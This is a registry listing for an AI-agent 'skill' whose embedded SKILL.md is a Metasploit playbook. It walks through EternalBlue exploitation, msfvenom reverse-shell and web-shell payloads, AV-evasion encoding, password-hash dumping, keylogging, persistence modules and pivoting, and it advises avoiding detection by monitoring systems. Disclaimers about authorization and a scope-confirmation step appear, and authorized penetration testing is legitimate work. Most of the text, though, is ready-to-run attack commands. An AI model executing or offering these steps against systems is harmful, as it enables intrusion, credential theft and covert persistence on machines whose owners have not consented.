{"id":"510c7cd6-f231-4464-9eaa-565b63433bba","shortId":"AxzGdh","kind":"skill","title":"metasploit-framework","tagline":"⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.","description":"# Metasploit Framework\n\n> **⚠️ AUTHORIZED USE ONLY**\n> This skill is for educational purposes or authorized security assessments only.\n> You must have explicit, written permission from the system owner before using this tool.\n> Misuse of this tool is illegal and strictly prohibited.\n\n## Purpose\n\nLeverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.\n\n## Prerequisites\n\n### Required Tools\n```bash\n# Metasploit must already be installed before using this skill.\n# Kali Linux usually ships with it preinstalled.\nmsfconsole --version\n```\n\nInstallation varies by operating system and package source. Follow your platform's documented package-manager or vendor installation process before using this skill. Do not rely on an unpinned remote installer script from inside this skill.\n\nIf you want database-backed features such as workspace tracking, initialize `msfdb` using the instructions for your local installation. This skill assumes Metasploit is already available and does not require `sudo`, `systemctl`, or other privileged host-level setup steps.\n\n### Required Knowledge\n- Network and system fundamentals\n- Understanding of vulnerabilities and exploits\n- Basic programming concepts\n- Target enumeration techniques\n\n### Required Access\n- Written authorization for testing\n- Network access to target systems\n- Understanding of scope and rules of engagement\n\nBefore running exploit modules, ask the user to confirm the exact target host, scope, and authorization state.\n\n## Outputs and Deliverables\n\n1. **Exploitation Evidence** - Screenshots and logs of successful compromises\n2. **Session Logs** - Command history and extracted data\n3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references\n4. **Post-Exploitation Artifacts** - Credentials, files, and system information\n\n## Core Workflow\n\n### Phase 1: MSFConsole Basics\n\nLaunch and navigate the Metasploit console:\n\n```bash\n# Start msfconsole\nmsfconsole\n\n# Quiet mode (skip banner)\nmsfconsole -q\n\n# Basic navigation commands\nmsf6 > help                    # Show all commands\nmsf6 > search [term]           # Search modules\nmsf6 > use [module]            # Select module\nmsf6 > info                    # Show module details\nmsf6 > show options            # Display required options\nmsf6 > set [OPTION] [value]    # Configure option\nmsf6 > run / exploit           # Execute module\nmsf6 > back                    # Return to main console\nmsf6 > exit                    # Exit msfconsole\n```\n\n### Phase 2: Module Types\n\nUnderstand the different module categories:\n\n```bash\n# 1. Exploit Modules - Target specific vulnerabilities\nmsf6 > show exploits\nmsf6 > use exploit/windows/smb/ms17_010_eternalblue\n\n# 2. Payload Modules - Code executed after exploitation\nmsf6 > show payloads\nmsf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp\n\n# 3. Auxiliary Modules - Scanning, fuzzing, enumeration\nmsf6 > show auxiliary\nmsf6 > use auxiliary/scanner/smb/smb_version\n\n# 4. Post-Exploitation Modules - Actions after compromise\nmsf6 > show post\nmsf6 > use post/windows/gather/hashdump\n\n# 5. Encoders - Obfuscate payloads\nmsf6 > show encoders\nmsf6 > set ENCODER x86/shikata_ga_nai\n\n# 6. Nops - No-operation padding for buffer overflows\nmsf6 > show nops\n\n# 7. Evasion - Bypass security controls\nmsf6 > show evasion\n```\n\n### Phase 3: Searching for Modules\n\nFind appropriate modules for targets:\n\n```bash\n# Search by name\nmsf6 > search eternalblue\n\n# Search by CVE\nmsf6 > search cve:2017-0144\n\n# Search by platform\nmsf6 > search platform:windows type:exploit\n\n# Search by type and keyword\nmsf6 > search type:auxiliary smb\n\n# Filter by rank (excellent, great, good, normal, average, low, manual)\nmsf6 > search rank:excellent\n\n# Combined search\nmsf6 > search type:exploit platform:linux apache\n\n# View search results columns:\n# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description\n```\n\n### Phase 4: Configuring Exploits\n\nSet up an exploit for execution:\n\n```bash\n# Select exploit module\nmsf6 > use exploit/windows/smb/ms17_010_eternalblue\n\n# View required options\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > show options\n\n# Set target host\nmsf6 exploit(...) > set RHOSTS 192.168.1.100\n\n# Set target port (if different from default)\nmsf6 exploit(...) > set RPORT 445\n\n# View compatible payloads\nmsf6 exploit(...) > show payloads\n\n# Set payload\nmsf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\n\n# Set local host for reverse connection\nmsf6 exploit(...) > set LHOST 192.168.1.50\nmsf6 exploit(...) > set LPORT 4444\n\n# View all options again to verify\nmsf6 exploit(...) > show options\n\n# Check if target is vulnerable (if supported)\nmsf6 exploit(...) > check\n\n# Execute exploit\nmsf6 exploit(...) > exploit\n# or\nmsf6 exploit(...) > run\n```\n\n### Phase 5: Payload Types\n\nSelect appropriate payload for the situation:\n\n```bash\n# Singles - Self-contained, no staging\nwindows/shell_reverse_tcp\nlinux/x86/shell_bind_tcp\n\n# Stagers - Small payload that downloads larger stage\nwindows/meterpreter/reverse_tcp\nlinux/x86/meterpreter/bind_tcp\n\n# Stages - Downloaded by stager, provides full functionality\n# Meterpreter, VNC, shell\n\n# Payload naming convention:\n# [platform]/[architecture]/[payload_type]/[connection_type]\n# Examples:\nwindows/x64/meterpreter/reverse_tcp\nlinux/x86/shell/bind_tcp\nphp/meterpreter/reverse_tcp\njava/meterpreter/reverse_https\nandroid/meterpreter/reverse_tcp\n```\n\n### Phase 6: Meterpreter Session\n\nWork with Meterpreter post-exploitation:\n\n```bash\n# After successful exploitation, you get Meterpreter prompt\nmeterpreter >\n\n# System Information\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getpid\n\n# File System Operations\nmeterpreter > pwd\nmeterpreter > ls\nmeterpreter > cd C:\\\\Users\nmeterpreter > download file.txt /tmp/\nmeterpreter > upload /tmp/tool.exe C:\\\\\n\n# Process Management\nmeterpreter > ps\nmeterpreter > migrate [PID]\nmeterpreter > kill [PID]\n\n# Networking\nmeterpreter > ipconfig\nmeterpreter > netstat\nmeterpreter > route\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1\n\n# Privilege Escalation\nmeterpreter > getsystem\nmeterpreter > getprivs\n\n# Credential Harvesting\nmeterpreter > hashdump\nmeterpreter > run post/windows/gather/credentials/credential_collector\n\n# Screenshots and Keylogging\nmeterpreter > screenshot\nmeterpreter > keyscan_start\nmeterpreter > keyscan_dump\nmeterpreter > keyscan_stop\n\n# Shell Access\nmeterpreter > shell\nC:\\Windows\\system32> whoami\nC:\\Windows\\system32> exit\nmeterpreter >\n\n# Background Session\nmeterpreter > background\nmsf6 exploit(...) > sessions -l\nmsf6 exploit(...) > sessions -i 1\n```\n\n### Phase 7: Auxiliary Modules\n\nUse auxiliary modules for reconnaissance:\n\n```bash\n# SMB Version Scanner\nmsf6 > use auxiliary/scanner/smb/smb_version\nmsf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24\nmsf6 auxiliary(...) > run\n\n# Port Scanner\nmsf6 > use auxiliary/scanner/portscan/tcp\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > set PORTS 1-1000\nmsf6 auxiliary(...) > run\n\n# SSH Version Scanner\nmsf6 > use auxiliary/scanner/ssh/ssh_version\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.0/24\nmsf6 auxiliary(...) > run\n\n# FTP Anonymous Login\nmsf6 > use auxiliary/scanner/ftp/anonymous\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > run\n\n# HTTP Directory Scanner\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > run\n\n# Brute Force Modules\nmsf6 > use auxiliary/scanner/ssh/ssh_login\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt\nmsf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt\nmsf6 auxiliary(...) > run\n```\n\n### Phase 8: Post-Exploitation Modules\n\nRun post modules on active sessions:\n\n```bash\n# List sessions\nmsf6 > sessions -l\n\n# Run post module on specific session\nmsf6 > use post/windows/gather/hashdump\nmsf6 post(windows/gather/hashdump) > set SESSION 1\nmsf6 post(...) > run\n\n# Or run directly from Meterpreter\nmeterpreter > run post/windows/gather/hashdump\n\n# Common Post Modules\n# Credential Gathering\npost/windows/gather/credentials/credential_collector\npost/windows/gather/lsa_secrets\npost/windows/gather/cachedump\npost/multi/gather/ssh_creds\n\n# System Enumeration\npost/windows/gather/enum_applications\npost/windows/gather/enum_logged_on_users\npost/windows/gather/enum_shares\npost/linux/gather/enum_configs\n\n# Privilege Escalation\npost/windows/escalate/getsystem\npost/multi/recon/local_exploit_suggester\n\n# Persistence\npost/windows/manage/persistence_exe\npost/linux/manage/sshkey_persistence\n\n# Pivoting\npost/multi/manage/autoroute\n```\n\n### Phase 9: Payload Generation with msfvenom\n\nCreate standalone payloads:\n\n```bash\n# Basic Windows reverse shell\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe\n\n# Linux reverse shell\nmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf\n\n# PHP reverse shell\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php\n\n# Python reverse shell\nmsfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py\n\n# PowerShell payload\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1\n\n# ASP web shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp\n\n# WAR file (Tomcat)\nmsfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war\n\n# Android APK\nmsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk\n\n# Encoded payload (evade AV)\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe\n\n# List available formats\nmsfvenom --list formats\n\n# List available encoders\nmsfvenom --list encoders\n```\n\n### Phase 10: Setting Up Handlers\n\nConfigure listener for incoming connections:\n\n```bash\n# Manual handler setup\nmsf6 > use exploit/multi/handler\nmsf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(multi/handler) > set LHOST 192.168.1.50\nmsf6 exploit(multi/handler) > set LPORT 4444\nmsf6 exploit(multi/handler) > exploit -j\n\n# The -j flag runs as background job\nmsf6 > jobs -l\n\n# When payload executes on target, session opens\n[*] Meterpreter session 1 opened\n\n# Interact with session\nmsf6 > sessions -i 1\n```\n\n## Quick Reference\n\n### Essential MSFConsole Commands\n\n| Command | Description |\n|---------|-------------|\n| `search [term]` | Search for modules |\n| `use [module]` | Select a module |\n| `info` | Display module information |\n| `show options` | Show configurable options |\n| `set [OPT] [val]` | Set option value |\n| `setg [OPT] [val]` | Set global option |\n| `run` / `exploit` | Execute module |\n| `check` | Verify target vulnerability |\n| `back` | Deselect module |\n| `sessions -l` | List active sessions |\n| `sessions -i [N]` | Interact with session |\n| `jobs -l` | List background jobs |\n| `db_nmap` | Run nmap with database |\n\n### Meterpreter Essential Commands\n\n| Command | Description |\n|---------|-------------|\n| `sysinfo` | System information |\n| `getuid` | Current user |\n| `getsystem` | Attempt privilege escalation |\n| `hashdump` | Dump password hashes |\n| `shell` | Drop to system shell |\n| `upload/download` | File transfer |\n| `screenshot` | Capture screen |\n| `keyscan_start` | Start keylogger |\n| `migrate [PID]` | Move to another process |\n| `background` | Background session |\n| `portfwd` | Port forwarding |\n\n### Common Exploit Modules\n\n```bash\n# Windows\nexploit/windows/smb/ms17_010_eternalblue\nexploit/windows/smb/ms08_067_netapi\nexploit/windows/http/iis_webdav_upload_asp\nexploit/windows/local/bypassuac\n\n# Linux\nexploit/linux/ssh/sshexec\nexploit/linux/local/overlayfs_priv_esc\nexploit/multi/http/apache_mod_cgi_bash_env_exec\n\n# Web Applications\nexploit/multi/http/tomcat_mgr_upload\nexploit/unix/webapp/wp_admin_shell_upload\nexploit/multi/http/jenkins_script_console\n```\n\n## Constraints and Limitations\n\n### Legal Requirements\n- Only use on systems you own or have written authorization to test\n- Document all testing activities\n- Follow rules of engagement\n- Report all findings to appropriate parties\n\n### Technical Limitations\n- Modern AV/EDR may detect Metasploit payloads\n- Some exploits require specific target configurations\n- Firewall rules may block reverse connections\n- Not all exploits work on all target versions\n\n### Operational Security\n- Use encrypted channels (reverse_https) when possible\n- Clean up artifacts after testing\n- Avoid detection by monitoring systems\n- Limit post-exploitation to agreed scope\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |\n| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads |\n| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |\n| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["metasploit","framework","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows"],"capabilities":["skill","source-sickn33","skill-metasploit-framework","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/metasploit-framework","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34666 github stars · SKILL.md body (13,544 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-23T06:51:33.392Z","embedding":null,"createdAt":"2026-04-18T21:40:43.407Z","updatedAt":"2026-04-23T06:51:33.392Z","lastSeenAt":"2026-04-23T06:51:33.392Z","tsv":"'-0144':498 '-1000':879 '/24':860,894 '/tmp':754 '/tmp/tool.exe':757 '/usr/share/wordlists/rockyou.txt':948 '/usr/share/wordlists/users.txt':942 '1':274,312,391,837,878,984,1229,1237 '10':1171,1509 '10.0.0.1':784 '192.168.1.0':859,893 '192.168.1.100':588,873,908,922,936 '192.168.1.50':625,1038,1052,1066,1080,1093,1107,1121,1134,1147,1198 '2':283,382,403 '2017':497 '3':291,417,475 '4':299,429,557 '4444':630,1040,1054,1068,1082,1095,1109,1123,1136,1149,1204 '445':600 '5':443,661,1153 '6':454,714 '7':466,839 '8':953 '80':782 '8080':780 '9':1021 'access':111,237,243,813 'action':434,1527 'activ':96,962,1290,1393 'add':778 'agre':1456 'alreadi':125,203 'android':1128 'android/meterpreter/reverse_tcp':712,1132 'anonym':899 'anoth':1347 'apach':540 'apk':1129 'applic':1369,1521 'appropri':480,665,1402 'architectur':702,1480 'artifact':303,1443 'ask':258 'asp':1100,1111 'assess':16,55,118 'assum':200 'attempt':1321 'author':4,14,43,53,116,239,269,1387 'autorunscript':1499 'auxiliari':107,418,425,516,840,843,855,862,870,875,881,890,896,905,910,919,924,933,938,944,950 'auxiliary/scanner/ftp/anonymous':903 'auxiliary/scanner/http/dir_scanner':917 'auxiliary/scanner/portscan/tcp':868 'auxiliary/scanner/smb/smb_version':428,853 'auxiliary/scanner/ssh/ssh_login':931 'auxiliary/scanner/ssh/ssh_version':888 'av':1142,1497,1503 'av/edr':1407 'avail':204,1159,1165 'averag':525 'avoid':1446 'back':183,372,1284 'background':825,828,1215,1301,1349,1350 'banner':328 'bash':122,321,390,484,566,670,723,847,964,1029,1180,1358 'basic':230,314,331,1030 'block':1421 'brute':926 'buffer':461 'bypass':468 'c':749,758,816,820 'captur':1337 'categori':389 'cd':748 'channel':1436 'check':549,641,650,1280,1477,1481,1496 'clean':1441 'code':406 'column':544 'combin':532 'command':286,333,338,1242,1243,1311,1312 'common':996,1355 'compat':602 'comprehens':86 'compromis':113,282,436 'concept':232 'configur':364,558,1175,1262,1417 'confirm':262 'connect':620,705,1179,1423,1463,1472 'consol':320,376 'constraint':1373 'contain':674 'control':470 'convent':700 'core':309 'creat':1026 'credenti':304,791,999 'current':1318 'custom':1513 'cve':297,493,496 'data':290 'databas':182,1308,1461 'database-back':181 'date':547 'db':1303,1471 'default':595 'deliver':273 'describ':1528 'descript':555,1244,1313 'deselect':1285 'detail':353 'detect':1409,1447,1501 'die':1487 'differ':387,593,1484 'direct':990 'directori':913 'disclosur':546 'display':357,1256 'document':153,1390 'download':683,689,752 'drop':1329 'dump':808,1325 'e':1150,1506 'educ':11,50 'elf':1056 'encod':444,449,452,1139,1166,1169,1505 'encoded.exe':1157 'encrypt':1435 'engag':253,1397 'enumer':234,422,1006 'escal':786,1012,1323 'essenti':1240,1310 'eternalblu':490 'evad':1141 'evas':467,473,1511 'evid':276 'exact':264 'exampl':707 'excel':521,531 'exe':1042,1155 'execut':369,407,565,651,1222,1278,1523 'exit':378,379,823 'explicit':21,60 'exploit':91,95,104,229,256,275,294,302,368,392,399,409,432,507,537,559,563,568,577,585,597,605,611,622,627,638,649,652,654,655,658,722,726,830,834,956,1188,1194,1200,1206,1208,1277,1356,1413,1426,1454,1473 'exploit/linux/local/overlayfs_priv_esc':1366 'exploit/linux/ssh/sshexec':1365 'exploit/multi/handler':1186 'exploit/multi/http/apache_mod_cgi_bash_env_exec':1367 'exploit/multi/http/jenkins_script_console':1372 'exploit/multi/http/tomcat_mgr_upload':1370 'exploit/unix/webapp/wp_admin_shell_upload':1371 'exploit/windows/http/iis_webdav_upload_asp':1362 'exploit/windows/local/bypassuac':1363 'exploit/windows/smb/ms08_067_netapi':1361 'exploit/windows/smb/ms17_010_eternalblue':402,572,1360 'extract':289 'f':1041,1055,1069,1083,1096,1110,1124,1154 'fails/no':1474 'featur':184 'file':305,740,941,947,1115,1334 'file.txt':753 'filter':518 'find':479,1400 'firewal':1418,1482 'flag':1212 'follow':149,1394 'forc':927 'format':1160,1163 'forward':1354 'framework':3,42,84 'ftp':898 'full':693 'function':694 'fundament':224 'fuzz':421 'gather':1000 'generat':106,1023 'get':728 'getpid':739 'getpriv':790 'getsystem':788,1320 'getuid':737,1317 'global':1274 'good':523 'great':522 'handler':1174,1182 'harvest':792 'hash':1327 'hashdump':794,1324 'help':335 'histori':287 'host':215,266,583,617 'host-level':214 'http':912 'https':1438 'illeg':37,76 'immedi':1488 'incom':1178 'info':350,1255 'inform':308,733,1258,1316 'init':1467 'initi':90,189 'insid':175 'instal':127,141,159,172,197 'instruct':193 'interact':1231,1295 'ipconfig':771 'issu':1459 'j':1209,1211 'java/meterpreter/reverse_https':711 'java/meterpreter/reverse_tcp':1119 'job':1216,1218,1298,1302 'kali':132 'keylog':800 'keylogg':1342 'keyscan':804,807,810,1339 'keyword':512 'kill':767 'knowledg':220 'l':779,832,969,1219,1288,1299 'larger':684 'launch':315 'legal':1376 'level':216 'leverag':81 'lhost':624,1037,1051,1065,1079,1092,1106,1120,1133,1146,1197 'limit':1375,1405,1451 'linux':133,539,1045,1364 'linux/x86/meterpreter/bind_tcp':687 'linux/x86/meterpreter/reverse_tcp':1050 'linux/x86/shell/bind_tcp':709 'linux/x86/shell_bind_tcp':678 'list':965,1158,1162,1164,1168,1289,1300 'listen':1176 'local':196,616 'log':279,285 'login':900 'low':526 'lport':629,1039,1053,1067,1081,1094,1108,1122,1135,1148,1203 'ls':746 'main':375 'maintain':110 'manag':156,760 'manual':527,1181 'map':293 'may':1408,1420 'metasploit':2,41,83,97,123,201,319,1410 'metasploit-framework':1 'meterpret':695,715,719,729,731,734,736,738,743,745,747,751,755,761,763,766,770,772,774,776,787,789,793,795,801,803,806,809,814,824,827,992,993,1227,1309 'migrat':764,1343,1489 'misus':32,71 'mode':326 'modern':1406 'modul':257,343,346,348,352,370,383,388,393,405,419,433,478,481,569,841,844,928,957,960,972,998,1249,1251,1254,1257,1279,1286,1357,1512 'monitor':1449 'move':1345 'msf6':334,339,344,349,354,360,366,371,377,397,400,410,413,423,426,437,440,447,450,463,471,488,494,502,513,528,534,570,576,584,596,604,610,621,626,637,648,653,657,829,833,851,854,861,866,869,874,880,886,889,895,901,904,909,915,918,923,929,932,937,943,949,967,976,979,985,1184,1187,1193,1199,1205,1217,1234 'msfconsol':139,313,323,324,329,380,1241 'msfdb':190,1466 'msfvenom':1025,1034,1048,1062,1076,1089,1103,1117,1130,1143,1161,1167 'multi/handler':1189,1195,1201,1207 'must':19,58,124 'n':1294 'name':487,545,699 'navig':317,332 'netstat':773 'network':221,242,769 'nmap':1304,1306 'no-oper':456 'nop':455,465 'normal':524 'o':1043,1057,1071,1085,1098,1112,1126,1137,1156 'obfusc':445 'open':1226,1230 'oper':144,458,742,1432 'opt':1265,1271 'option':356,359,362,365,575,580,633,640,1260,1263,1268,1275 'output':271 'overflow':462 'overview':1531 'owner':27,66 'p':781,1035,1049,1063,1077,1090,1104,1118,1131,1144 'packag':147,155 'package-manag':154 'pad':459 'parti':1403 'pass':946 'password':1326 'payload':105,404,412,415,446,603,607,609,613,662,666,681,698,703,1022,1028,1088,1140,1191,1221,1411,1479,1485,1495,1500 'penetr':87 'permiss':23,62 'persist':1015 'phase':311,381,474,556,660,713,838,952,1020,1170 'php':1059 'php/meterpreter/reverse_tcp':710,1064 'pid':765,768,1344 'pivot':1018 'platform':101,151,501,504,538,701 'port':591,864,877,1353 'portfwd':777,1352 'possibl':1440 'post':94,301,431,439,721,955,959,971,980,986,997,1453 'post-exploit':93,300,430,720,954,1452 'post/linux/gather/enum_configs':1010 'post/linux/manage/sshkey_persistence':1017 'post/multi/gather/ssh_creds':1004 'post/multi/manage/autoroute':1019 'post/multi/recon/local_exploit_suggester':1014 'post/windows/escalate/getsystem':1013 'post/windows/gather/cachedump':1003 'post/windows/gather/credentials/credential_collector':797,1001 'post/windows/gather/enum_applications':1007 'post/windows/gather/enum_logged_on_users':1008 'post/windows/gather/enum_shares':1009 'post/windows/gather/hashdump':442,978,995 'post/windows/gather/lsa_secrets':1002 'post/windows/manage/persistence_exe':1016 'postgresql':1469 'powershel':1087 'preinstal':138 'prerequisit':119 'privileg':213,785,1011,1322 'process':160,759,1348,1492 'program':231 'prohibit':40,79 'prompt':730 'provid':98,692 'ps':762 'psh':1097 'purpos':12,51,80 'pwd':744 'python':1073 'python/meterpreter/reverse_tcp':1078 'q':330 'quick':1238 'quiet':325 'r':783 'rank':520,530,548 'raw':1070,1084 'reconnaiss':846 'refer':298,1239 'reli':167 'remot':171 'report':1398 'requir':120,208,219,236,358,574,1377,1414 'result':543 'return':373 'revers':619,1032,1046,1060,1074,1422,1437 'rhost':587,858,872,892,907,921,935 'rout':775 'rport':599 'rule':251,1395,1419 'run':255,367,659,796,863,882,897,911,925,951,958,970,987,989,994,1213,1276,1305,1464,1476 'scan':108,420 'scanner':850,865,885,914 'scanner/smb/smb_version':856 'scope':249,267,1457 'screen':1338 'screenshot':277,798,802,1336 'script':173 'search':340,342,476,485,489,491,495,499,503,508,514,529,533,535,542,1245,1247 'secur':15,54,117,469,1433 'select':347,567,664,1252 'self':673 'self-contain':672 'session':284,716,826,831,835,963,966,968,975,983,1225,1228,1233,1235,1287,1291,1292,1297,1351,1475,1486 'set':361,414,451,560,581,586,589,598,608,612,615,623,628,857,871,876,891,906,920,934,939,945,982,1172,1190,1196,1202,1264,1267,1273 'setg':1270 'setup':217,1183 'shell':697,812,815,1033,1047,1061,1075,1102,1328,1332 'shell.apk':1138 'shell.asp':1113 'shell.elf':1058 'shell.exe':1044 'shell.php':1072 'shell.ps1':1099 'shell.py':1086 'shell.war':1127 'ship':135 'show':336,351,355,398,411,424,438,448,464,472,579,606,639,1259,1261 'singl':671 'situat':669 'skill':8,47,131,164,177,199,1519 'skill-metasploit-framework' 'skip':327 'small':680 'smb':517,848 'solut':1460 'sourc':148 'source-sickn33' 'specif':395,974,1415 'ssh':883 'stabl':1491 'stage':676,685,688 'stageless':1494 'stager':679,691 'standalon':1027 'start':322,805,1340,1341,1468 'state':270 'step':218 'stop':811 'strict':39,78 'success':281,725 'sudo':209,1465 'support':647 'sysinfo':735,1314 'system':26,65,114,145,223,246,307,732,741,1005,1315,1331,1381,1450 'system32':818,822 'systemctl':210 'target':233,245,265,394,483,582,590,643,1224,1282,1416,1430 'technic':1404 'techniqu':235 'templat':1514 'term':341,1246 'test':88,241,1389,1392,1445 'tomcat':1116 'tool':31,35,70,74,121 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'track':188 'transfer':1335 'tri':1483 'troubleshoot':1458 'type':384,506,510,515,536,663,704,706 'understand':225,247,385 'unifi':100 'unpin':170 'upload':756 'upload/download':1333 'use':5,29,44,68,129,162,191,345,401,427,441,571,842,852,867,887,902,916,930,977,1185,1250,1379,1434,1493,1498,1504,1510,1517 'user':260,750,940,1319 'usual':134 'val':1266,1272 'valu':363,1269 'vari':142 'vendor':158 'verifi':553,636,1281,1478 'version':140,849,884,1431 'view':541,573,601,631 'vnc':696 'vulner':103,227,292,295,396,554,645,1283 'want':180 'war':1114,1125 'web':1101,1368 'whoami':819 'window':505,817,821,1031,1359 'windows/gather/hashdump':981 'windows/meterpreter/reverse_tcp':686,1105,1145 'windows/shell_reverse_tcp':677 'windows/smb/ms17_010_eternalblue':578 'windows/x64/meterpreter/reverse_tcp':416,614,708,1036,1091,1192 'work':717,1427 'workflow':310,1525 'workspac':187 'written':22,61,238,1386 'x86/shikata_ga_nai':453,1151,1507","prices":[{"id":"62509d7d-9f8f-44e5-a1b8-ea742d5cb839","listingId":"510c7cd6-f231-4464-9eaa-565b63433bba","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:40:43.407Z"}],"sources":[{"listingId":"510c7cd6-f231-4464-9eaa-565b63433bba","source":"github","sourceId":"sickn33/antigravity-awesome-skills/metasploit-framework","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/metasploit-framework","isPrimary":false,"firstSeenAt":"2026-04-18T21:40:43.407Z","lastSeenAt":"2026-04-23T06:51:33.392Z"}],"details":{"listingId":"510c7cd6-f231-4464-9eaa-565b63433bba","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"metasploit-framework","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34666,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-23T06:41:03Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"b261164815e239273acce365b091968e06df84fe","skill_md_path":"skills/metasploit-framework/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/metasploit-framework"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"metasploit-framework","description":"⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/metasploit-framework"},"updatedAt":"2026-04-23T06:51:33.392Z"}}